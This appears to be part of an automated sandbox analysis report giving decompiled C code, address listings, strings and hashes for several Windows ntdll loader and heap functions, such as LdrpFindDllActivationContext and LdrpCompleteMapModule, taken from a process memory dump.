Instruction Fuzzy Hash: D45117722056959FE722DB69C848F67BBF8FF80B50F180568F951CB291D734EA40CB62

Uniqueness

Uniqueness Score: -1.00%

Function 017E8E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E017E8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x18ad360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x18a8464; // 0x73b80110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x18a5780 & 0x00000003) != 0) {
							E01835510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x18a5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E017FB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x18a7984; // 0x1352b78
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x18a8464; // 0x73b80110
					 *0x18ab1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E017E9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x18a5780 & 0x00000005) != 0) {
						_push(_t49);
						E01835510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x017e8e0f
0x017e8e16
0x017e8e19
0x017e8e1b
0x017e8e21
0x017e8e7f
0x017e8e85
0x01829354
0x0182936c
0x01829371
0x0182937b
0x01829381
0x01829381
0x0182937b
0x017e8e9d
0x017e8e9d
0x017e8e29
0x017e8e2c
0x017e8e38
0x017e8e3e
0x017e8e43
0x017e8eb5
0x017e8eb9
0x018292aa
0x018292af
0x018292e8
0x018292e8
0x018292af
0x017e8eb9
0x017e8e45
0x017e8e53
0x017e8e5b
0x017e8e5f
0x017e8e78
0x017e8e78
0x017e8e7d
0x017e8ec3
0x017e8ecd
0x017e8ed2
0x017e8ed2
0x017e8ec5
0x017e8ec5
0x00000000
0x017e8e7d
0x017e8e67
0x017e8ea4
0x0182931a
0x00000000
0x00000000
0x01829320
0x017e8ea4
0x017e8e70
0x01829325
0x01829340
0x01829345
0x01829345
0x017e8e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

LdrpFindDllActivationContext, xrefs: 01829331, 0182935D
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0182932A
Querying the active activation context failed with status 0x%08lx, xrefs: 01829357
minkernel\ntdll\ldrsnap.c, xrefs: 0182933B, 01829367

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: e8041d7f6fb7c47b6d08be67815357a7db979e640b9525495037dcc74874a353
Instruction ID: 8a88308293e43c90485e707d23eac6b60c357a458d3932b0e9d47671b49d94ad
Opcode Fuzzy Hash: e8041d7f6fb7c47b6d08be67815357a7db979e640b9525495037dcc74874a353
Instruction Fuzzy Hash: 03410772A003259FEF36AA5C888CA76F7F5AB0D358F49416AE90497151E7706EC087C3

Uniqueness

Uniqueness Score: -1.00%

Function 018749A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 01874A61
This is located in the %s field of the heap header., xrefs: 01874AD6
HEAP: , xrefs: 01874A4A, 01874A5D, 01874A5F, 01874AC4
HEAP[%wZ]: , xrefs: 01874A3D, 01874AB7

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: 76e75d640870d6ed31b2a611d545c32d2979da08c8893763b6a663a303e2a322
Instruction ID: 757e79d02b6a5f3cd989fc7b6e67419f1fdc347a1593177a92d1bdb951ef38a5
Opcode Fuzzy Hash: 76e75d640870d6ed31b2a611d545c32d2979da08c8893763b6a663a303e2a322
Instruction Fuzzy Hash: 9E312131200159EFD721EB9DC8CAFABF7A8EF00724F14415AF905CB251E674EA44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 017C8794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E017C8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E017C934A() != 0) {
								_t159 = E0183A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x18a5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01835510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x18a5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E017C849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E017C8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E017C8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x18a5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x18a5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E017D2280(_t92, 0x18a86cc);
															_t94 = E01889DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E017E61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x18a5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E017C8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x18a5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x18a5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E017FF380(_t136, 0x1791184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E017D2280(_t108, 0x18a86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E017E61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01889D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E017CFFB0(_t118, _t156, 0x18a86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E017F9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x017c8799
0x017c879d
0x017c87a1
0x017c87a3
0x017c87a8
0x017c87c3
0x017c87c3
0x017c87c8
0x017c87d1
0x017c87d4
0x017c87d8
0x017c87e5
0x017c87ec
0x01819bfe
0x01819c00
0x01819c02
0x01819c08
0x01819c0d
0x01819c0f
0x01819c14
0x01819c2d
0x01819c32
0x01819c37
0x01819c3a
0x01819c3c
0x01819c42
0x01819c42
0x01819c3c
0x01819c02
0x017c87da
0x017c87df
0x017c87e3
0x00000000
0x00000000
0x017c87e3
0x017c87f2
0x00000000
0x017c87fb
0x017c87fd
0x017c87fe
0x017c880e
0x017c880f
0x017c8810
0x017c8814
0x017c881a
0x017c881c
0x017c881f
0x017c8821
0x017c8822
0x017c8824
0x017c8826
0x017c882c
0x017c882e
0x01819c48
0x01819c48
0x017c8834
0x017c8834
0x017c8837
0x00000000
0x00000000
0x017c8837
0x017c882e
0x017c883d
0x017c8840
0x017c8843
0x017c8846
0x017c8849
0x017c884c
0x017c884e
0x017c8850
0x017c8852
0x017c8854
0x017c8857
0x017c88b4
0x017c88b6
0x017c88b6
0x017c8859
0x017c8859
0x017c8859
0x017c8861
0x017c8866
0x017c886a
0x017c893d
0x017c8941
0x00000000
0x017c8947
0x017c8947
0x017c894a
0x017c894c
0x00000000
0x017c8952
0x017c8955
0x017c895a
0x017c895d
0x017c895d
0x017c895f
0x017c8961
0x017c8961
0x017c8968
0x00000000
0x00000000
0x017c896a
0x017c896b
0x017c896e
0x00000000
0x017c8970
0x017c8970
0x017c8970
0x017c8970
0x017c8972
0x017c8972
0x017c8974
0x00000000
0x017c897a
0x017c897a
0x017c897d
0x00000000
0x017c8983
0x01819c65
0x01819c6d
0x01819c72
0x01819c75
0x01819c75
0x01819c82
0x01819c86
0x01819c87
0x01819c88
0x01819c89
0x01819c8c
0x01819c90
0x01819c95
0x01819c97
0x01819ca0
0x01819ca3
0x01819ca9
0x01819ca9
0x00000000
0x01819ca9
0x01819ca3
0x00000000
0x01819c97
0x017c897d
0x00000000
0x017c8974
0x017c8988
0x017c8992
0x017c8996
0x00000000
0x017c8996
0x017c894c
0x00000000
0x017c8870
0x017c887b
0x017c887d
0x017c887f
0x017c8881
0x017c8884
0x017c8884
0x017c8886
0x017c8889
0x017c888c
0x017c888e
0x017c8891
0x017c8891
0x017c8898
0x00000000
0x00000000
0x017c889a
0x017c889b
0x017c889e
0x00000000
0x00000000
0x017c88a0
0x017c88a8
0x017c88b0
0x017c88b2
0x017c88d3
0x017c88d5
0x00000000
0x017c88d7
0x017c88db
0x017c88dc
0x017c88e0
0x017c88e8
0x017c88ee
0x017c88f0
0x017c88f3
0x017c88fc
0x017c8901
0x017c8906
0x017c890c
0x017c890c
0x017c890f
0x017c8916
0x017c8917
0x017c8918
0x017c8919
0x017c891a
0x017c891f
0x017c8921
0x01819c52
0x01819c55
0x01819c5b
0x01819cac
0x01819cc0
0x01819cc0
0x01819c55
0x017c8927
0x017c8927
0x017c892f
0x017c8933
0x00000000
0x017c88f5
0x017c88f5
0x00000000
0x017c88f7
0x017c88f7
0x017c88fa
0x00000000
0x00000000
0x00000000
0x00000000
0x017c88fa
0x017c88f5
0x017c88f3
0x00000000
0x017c88d5
0x00000000
0x017c88b2
0x017c88c9
0x00000000
0x017c88c9
0x017c887f
0x017c886a
0x017c8857
0x017c8852
0x017c88bf
0x017c88bf
0x017c87aa
0x017c87ad
0x017c87ae
0x017c87b4
0x017c87b5
0x017c87b6
0x017c87b8
0x017c87bd
0x017c87c1
0x017c87f4
0x017c87fa
0x00000000
0x00000000
0x00000000
0x017c87c1
0x00000000

Strings

LdrpDoPostSnapWork, xrefs: 01819C1E
minkernel\ntdll\ldrsnap.c, xrefs: 01819C28
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01819C18

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: 67d8f0050148db335afcd89483e926783e6318abc357f5a835ce1512b80e29b7
Instruction ID: 117da58df9a9ad3474dad248b5936f2e5eb33eb4a1a60fe0d9fd425cbf693348
Opcode Fuzzy Hash: 67d8f0050148db335afcd89483e926783e6318abc357f5a835ce1512b80e29b7
Instruction Fuzzy Hash: 7A911371A002069BEF18DF59D880ABAF7F5FF44B14B45406DEA05AB645EB30EA41CB92

Uniqueness

Uniqueness Score: -1.00%

Function 017C7E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E017C7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E017CCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E017BC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x18a5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01835510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x18a5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E017D7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E017D7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01837016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E017D7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E017D7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01837016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E017EA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E017BB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x017c7e4c
0x017c7e50
0x017c7e55
0x017c7e58
0x017c7e5d
0x017c7e71
0x017c7f33
0x017c7e77
0x017c7e77
0x017c7e79
0x017c7e79
0x017c7e7e
0x017c7f45
0x01819848
0x00000000
0x01819848
0x017c7f4e
0x017c7f53
0x017c7f5a
0x00000000
0x00000000
0x0181985a
0x01819862
0x01819866
0x00000000
0x0181986c
0x00000000
0x0181986c
0x017c7e84
0x017c7e84
0x017c7e8d
0x01819871
0x017c7eb8
0x017c7ec0
0x017c7ec0
0x017c7e9a
0x0181987e
0x00000000
0x00000000
0x01819884
0x0181988b
0x018198a7
0x018198ac
0x018198b1
0x018198b6
0x018198b8
0x018198b8
0x018198b9
0x00000000
0x018198b9
0x017c7ea0
0x017c7ea7
0x00000000
0x00000000
0x017c7eac
0x017c7eb1
0x017c7ec6
0x017c7ed0
0x018198cc
0x017c7ed6
0x017c7ed6
0x017c7ed6
0x017c7ede
0x017c7ee3
0x018198e3
0x018198f0
0x01819902
0x018198f2
0x018198fb
0x018198fb
0x01819907
0x0181991d
0x0181991d
0x01819907
0x018198e3
0x017c7ef0
0x017c7f14
0x017c7f14
0x017c7f1e
0x01819946
0x017c7f24
0x017c7f24
0x017c7f24
0x017c7f2c
0x0181996a
0x01819975
0x01819975
0x0181997e
0x01819993
0x01819993
0x0181997e
0x00000000
0x017c7ef2
0x017c7efc
0x017c7f0a
0x017c7f0e
0x01819933
0x00000000
0x01819933
0x00000000
0x017c7f0e
0x00000000
0x00000000
0x00000000
0x017c7eb1

Strings

LdrpCompleteMapModule, xrefs: 01819898
minkernel\ntdll\ldrmap.c, xrefs: 018198A2
Could not validate the crypto signature for DLL %wZ, xrefs: 01819891

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 400d5d7eb3437389740a9cb8894d999b1beac20f28163ac0ec634ed076189495
Instruction ID: 00cd56f7958c6ebc15b12a4ae2481f22e6476fcfe30a48ff9b0deef4f28dd3ef
Opcode Fuzzy Hash: 400d5d7eb3437389740a9cb8894d999b1beac20f28163ac0ec634ed076189495
Instruction Fuzzy Hash: DB51F332A007469BEB29CB5DC854B2AFBE4AB05B18F44069DED51DB3D5CB30EA40CF51

Uniqueness

Uniqueness Score: -1.00%

Function 017BE620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E017BE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E017BF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E017F95D0();
						}
						if(_t78 != 0) {
							L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E017FFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E017FBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E017F9600();
					if(_t97 < 0) {
						goto L6;
					}
					E017FBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L017BF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E017FBB40(_t83, _t102 + 0x24, _t78);
								if(L017C43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E017FBB40(_t84, _t102 + 0x24, _t94);
									if(L017C43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x017be620
0x017be628
0x017be62f
0x017be631
0x017be635
0x017be637
0x017be63e
0x01815503
0x01815503
0x017be64c
0x017be64c
0x017be651
0x00000000
0x00000000
0x017be661
0x017be665
0x0181542a
0x017be715
0x017be71a
0x017be71c
0x017be720
0x017be720
0x017be727
0x017be736
0x017be736
0x017be743
0x017be743
0x017be673
0x017be678
0x017be67d
0x017be682
0x017be685
0x017be692
0x017be69b
0x017be6a3
0x017be6ad
0x017be6b1
0x017be6b2
0x017be6bb
0x017be6bf
0x017be6c0
0x017be6c8
0x017be6cc
0x017be6d5
0x017be6d9
0x00000000
0x00000000
0x017be6e5
0x017be6ea
0x017be6f9
0x017be70b
0x017be70f
0x01815439
0x0181545e
0x0181545e
0x00000000
0x0181545e
0x0181543b
0x0181543e
0x01815440
0x01815445
0x01815472
0x01815475
0x0181548d
0x01815493
0x018154a9
0x00000000
0x00000000
0x018154ab
0x018154b4
0x018154bc
0x018154c8
0x018154de
0x018154fb
0x018154e0
0x018154e6
0x018154eb
0x018154eb
0x018154de
0x00000000
0x018154bc
0x01815477
0x0181547a
0x01815480
0x01815483
0x01815486
0x0181548b
0x00000000
0x00000000
0x00000000
0x0181548b
0x00000000
0x00000000
0x00000000
0x00000000
0x01815447
0x01815447
0x01815447
0x01815447
0x0181544e
0x00000000
0x00000000
0x01815450
0x01815452
0x01815455
0x0181545a
0x00000000
